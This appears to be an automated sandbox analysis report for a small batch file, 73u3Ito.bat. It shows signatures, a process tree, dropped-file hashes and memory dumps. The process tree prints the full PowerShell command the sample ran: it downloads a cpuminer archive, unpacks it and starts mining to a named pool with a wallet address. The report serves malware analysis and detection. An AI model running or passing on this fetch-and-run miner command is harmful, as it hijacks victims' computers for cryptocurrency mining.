b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb

Analysis

max time kernel
1793s
max time network
1806s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
04/02/2024, 17:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

73u3Ito.bat
Size

499B
MD5

fe74bff27516829a88cfbc6f6e99646f
SHA1

0c15d859211c79910b277d07e729bec7197a60cd
SHA256

b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
SHA512

a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
6	3996	powershell.exe
10	3996	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4332	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4332	cpuminer-sse2.exe
4332	cpuminer-sse2.exe
4332	cpuminer-sse2.exe
4332	cpuminer-sse2.exe
4332	cpuminer-sse2.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3996	powershell.exe
3996	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3996	powershell.exe
Token: SeManageVolumePrivilege	3800	svchost.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1808 wrote to memory of 3996	1808	cmd.exe	85
PID 1808 wrote to memory of 3996	1808	cmd.exe	85
PID 3996 wrote to memory of 2640	3996	powershell.exe	94
PID 3996 wrote to memory of 2640	3996	powershell.exe	94
PID 2640 wrote to memory of 4332	2640	cmd.exe	95
PID 2640 wrote to memory of 4332	2640	cmd.exe	95

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1808
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3996
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2640
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4332

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
1⤵
PID:2444

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3800

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Comms\UnistoreDB\store.jfm

Filesize
16KB

MD5
7ffd48913865630103adde464fe68a5f

SHA1
17c35538502c0a7c793451791960b01208a44539

SHA256
1958db08b270e0b615d93a4885eae329898373ce286c7065fc3c79282f6a325c

SHA512
99abada1c4a9b43f6b5a63c19e069ba040b769b3e40ec3d2a5d8ca547b3957c828d9b9e6cf6ed6ec707c4f28d18f3e01a0b5433d35e7806632686208c78babf1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o25x31ht.hj5.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
1.7MB

MD5
4918f8aebed3965198ca7d39fe1d887a

SHA1
e1405235c5a6b694c1e7c4b8b5533a67f655fc38

SHA256
0809e88c6ff647f2862525ea38afc80de956062672fcb00524245331c300554f

SHA512
3c7c2bd6f449b5184e7fa0fcd30f2d111107f7895f8b0cbecc43b3955d26d825dbddd52aafa88ae0769b33266b9b1c133fd6b6216738544b9cc6177e2b228377

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
1.7MB

MD5
3745839c5728d2ab5a4ca7c268dafc40

SHA1
5d0a27472a71bc35664f1654f4bdcfab6d5e67ff

SHA256
6ab15307177e72c33bf76657de5b3baf918d676f07370cd65da0017641aa38f7

SHA512
0fcdef2dee0e988dd3055beb97af4de613e75856fa8d2c24d0de56bb8d0b1cd769ca65c755c0534aec7080b9bdffb57f1a65495278e81358550f28c71bda81a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
940KB

MD5
533d539278461992e236386e6f463271

SHA1
00f43b8555b4c2c78650d6c1fc55826ae69b87d1

SHA256
b3d147ec865514bd159406240c549e4983c36f4fffc15437fc47c05becc7c0f9

SHA512
b11830edc59c49f22fff85fb91b2ec3664e91ab9959305bcfc3009f561b7c6025adb706ff911db59a5e01ce9071ba21a07441cf9c4d19ddee583a28e233a1383

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
921KB

MD5
a43e8d93b6b05abff0a7e27c119f30ea

SHA1
c347af2d2b7854d81cac3345bde615137f8cda4b

SHA256
14ac6c9439d99b11e9fa107b2077ef5ac1f33fc3f4a328fadba6a58ee4729668

SHA512
c436f9fcc869508cde597c3859ab04974150e720797b5bcf893ad4edf0b009e919a3fa92a178c6e821e673db6b80e81789313f42868ad7fbea8c67811f90db5e

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
1.0MB

MD5
79f516211d407a8ec27afa1974f8d546

SHA1
4c77d31c11b460393121d990273643cfa8649fa5

SHA256
8f9876bca235d0ac79883dea1a20d197aaf8a926af5df5066620d14bbe54c7bc

SHA512
1830b666a21683a745ab3b6d4185c985f6c30aea68c5dbe251caf9459a6754695d1987b3c22cefd12088cd895341c495087bdc5586d3b9c9493a6d164e4c4a3c

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
1.7MB

MD5
dd1526e4a5f3f2dd2d73cc0d27909ebe

SHA1
d21c9a131ea202ddac350773a74d9a75d2b01bf7

SHA256
2c5da9e4e3ae74e93ce86beac253a93b0ebc2180f72773a2088782abc09b7bbe

SHA512
482b246d88bcd18f007dfd67898a892abfd73561cf6b414ccf475cd8ee6f292fea3594b3a92874328d45ba19541e6fceaf02d7940dcc5228704426076b102676

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
1.4MB

MD5
110299fddba773669511f8cbe75dd510

SHA1
5c088847bcf82ae0474cdc968ab6e95c79f09a4d

SHA256
eefec2b8e4fd8215a5f7e06664c000532eb25f071e0d769aa65f90bdd12993c7

SHA512
3193d3dc0f0380d55406a8c9bc3ae082bfc598fb4c9b63fd44d16394a9a4f7845427dc9bd0041ab6df19eb851234d4b581fe12b72c04b9de9f720fd169c51244

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/3996-19-0x00000231D4160000-0x00000231D4172000-memory.dmp

Filesize
72KB

Download
memory/3996-21-0x00007FFC0FA80000-0x00007FFC10541000-memory.dmp

Filesize
10.8MB

Download
memory/3996-59-0x00007FFC0FA80000-0x00007FFC10541000-memory.dmp

Filesize
10.8MB

Download
memory/3996-20-0x00000231B9EE0000-0x00000231B9EEA000-memory.dmp

Filesize
40KB

Download
memory/3996-0-0x00000231D4190000-0x00000231D4222000-memory.dmp

Filesize
584KB

Download
memory/3996-17-0x00000231D2000000-0x00000231D2016000-memory.dmp

Filesize
88KB

Download
memory/3996-13-0x00000231D2020000-0x00000231D2030000-memory.dmp

Filesize
64KB

Download
memory/3996-16-0x00000231D2020000-0x00000231D2030000-memory.dmp

Filesize
64KB

Download
memory/3996-15-0x00000231D4440000-0x00000231D454E000-memory.dmp

Filesize
1.1MB

Download
memory/3996-14-0x00000231D2020000-0x00000231D2030000-memory.dmp

Filesize
64KB

Download
memory/3996-12-0x00007FFC0FA80000-0x00007FFC10541000-memory.dmp

Filesize
10.8MB

Download
memory/3996-11-0x00000231D40F0000-0x00000231D4112000-memory.dmp

Filesize
136KB

Download
memory/3996-10-0x00000231B9EB0000-0x00000231B9EC0000-memory.dmp

Filesize
64KB

Download
memory/4332-74-0x000000006FEB0000-0x000000006FF48000-memory.dmp

Filesize
608KB

Download
memory/4332-92-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4332-73-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4332-76-0x0000000001010000-0x00000000028C5000-memory.dmp

Filesize
24.7MB

Download
memory/4332-77-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4332-82-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4332-87-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4332-75-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4332-102-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4332-107-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4332-112-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4332-117-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4332-122-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4332-127-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4332-132-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4332-72-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download